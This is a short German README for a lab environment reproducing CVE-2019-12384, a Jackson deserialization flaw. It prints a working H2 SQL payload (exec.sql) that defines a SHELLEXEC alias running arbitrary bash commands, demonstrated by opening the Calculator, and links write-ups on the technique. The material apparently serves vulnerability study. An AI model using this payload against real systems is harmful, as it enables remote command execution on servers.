
CVE-2019-12384 Schwachstellen-Testumgebung
Importieren Sie das Projekt in IDEA, konfigurieren Sie Maven und aktivieren Sie anschließend den automatischen Import der Abhängigkeiten. Schreiben Sie dann die folgende Datei in ein leeres lokales Webverzeichnis und speichern Sie sie als exec.sql. Starten Sie außerdem einen HTTP-Server:
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"/bin/bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('open /Applications/Calculator.app')
Bitte passen Sie die entsprechenden Teile im Code an, um sie an verschiedene Betriebssystemumgebungen anzupassen.
Es ist zu sehen, dass der Rechner (Calculator) geöffnet wird.
https://blog.doyensec.com/2019/07/22/jackson-gadgets.html
https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html